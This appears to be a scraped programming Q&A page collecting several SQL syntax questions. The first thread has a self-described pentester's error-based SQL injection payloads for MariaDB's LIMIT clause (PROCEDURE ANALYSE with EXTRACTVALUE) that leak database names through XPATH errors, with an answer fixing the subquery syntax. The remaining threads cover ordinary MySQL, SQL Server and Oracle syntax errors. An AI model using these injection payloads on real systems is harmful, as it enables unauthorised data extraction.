i am pentester and i am testing error-based sql injection in limit clause on my MariaDB 5.5.65 server. There is some trouble.
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,select '123',0x7178627171)),1);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select '123',0x7178627171)),1)' at line 1
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,'123',0x7178627171)),1);
ERROR 1105 (HY000): XPATH syntax error: '\qjjkq123qxbqq'
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,database(),0x7178627171)),1);
ERROR 1105 (HY000): XPATH syntax error: '\qjjkqinformation_schemaqxbqq'
I can retrieve information like database() and version(), but can't use select. Is this feature of MariaDB? Can i bypass this or it's impossible to use select in procedure analyse in MariaDB server?
If you want to use select to return a scalar value in an expression, you have to put it in parentheses to make it a scalar subquery:
EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,select '123',0x7178627171))
Should be:
EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,(select '123'),0x7178627171))
In this example, that still results in an XPATH error, but that's independent of the question you asked.
Related
Good evening
I am trying to insert data from one table to another in my script and it comes up with database not found - have I done something wrong?
mysql -e INSERT INTO mysql.db SELECT * from "$cpuser"_mysql.db;
CPUser is a variable manually assigned earlier in the script.
From the CLI I can select * from both
Output from comment;
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''domain7mysql4'_mysql.db' at line 1
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''domain7mysql4'_mysql.user' at line 1
-se expects a string, so you need to provide one
mysql -e "INSERT INTO mysql.db SELECT * from `${cpuser}_mysql`.db;"
or
mysql -e "INSERT INTO mysql.db SELECT * from ${cpuser}_mysql.db;"
if there are no reserved text
Attempting to perform operations with a random integer in SQL.
The following code works perfectly as intended when run as pure SQL, but triggers a syntax error when attempting to save it into a stored procedure.
SET #sample_count = (SELECT count(*)
FROM cinder_sample);
SELECT #sample_count;
SET #random_ID = (SELECT FLOOR(RAND()*#sample_count));
SELECT #random_ID;
Any ideas as to what could be going wrong?
The exact error triggered is:
"The following query has failed: "CREATE DEFINER=root#localhost PROCEDURE play_random_sp() NOT DETERMINISTIC CONTAINS SQL SQL SECURITY DEFINER DELIMITER // SET #sample_count = (SELECT count() FROM cinder_sample)// SELECT #sample_count// SET #random_ID = (SELECT FLOOR(RAND()#sample_count))// SELECT #random_ID"
MySQL said: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '// SET #sample_count = (SELECT count(*) FROM cinder_sample)// SELECT' at line 1"
New to SQL and trying to run this code and I get the error "#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '#Qtable TABLE(Qid INT) END' at line 3". The code runs fine if I take out the DECLARE statement;
SET #query_id = (SELECT ID from ua820988_dev.users WHERE `email` = 'example#gmail.com');
CREATE PROCEDURE query_requests()
BEGIN
DECLARE #Qtable TABLE(Qid INT)
END;
SELECT * from ua820988_dev.requests WHERE `match` = #query_id;
SELECT * from ua820988_dev.requests_archive WHERE `match` = #query_id;
I'm hoping to eventually put the results from the 2nd and 3rd SELECT statements into the table, but this is the watered down version for now just trying to get the code to run. I'm running SQL 5.6 on MariaDB 10.2.
Unsure what syntax the error is referring to at this statement :-
Use MyDatabase
CREATE TABLE TestTable
AS (SELECT * FROM dbo.MyTable);
Any help is appreciated!
The dbo suggests that you are using SQL Server. The syntax error is that this syntax is not supported.
The equivalent syntax in SQL Server is:
SELECT *
INTO TestTable
FROM dbo.MyTable;
You need to use like below. The one you are using is Oracle syntax.
Use MyDatabase
Go
SELECT * INTO TestTable FROM dbo.MyTable
GO
set NOEXEC ON;
Select * from emp;
Set NOEXEC OFF;
This validation is working in SQL Server. But It's not working in oracle.
Is there any syntax to check the query is valid or not in Oracle.
Using EXPLAIN PLAN
EXPLAIN PLAN FOR SELECT FROM emp;
ERROR at line 1: ORA-00936: missing expression
EXPLAIN PLAN FOR SELECT * FROM emp;
Explained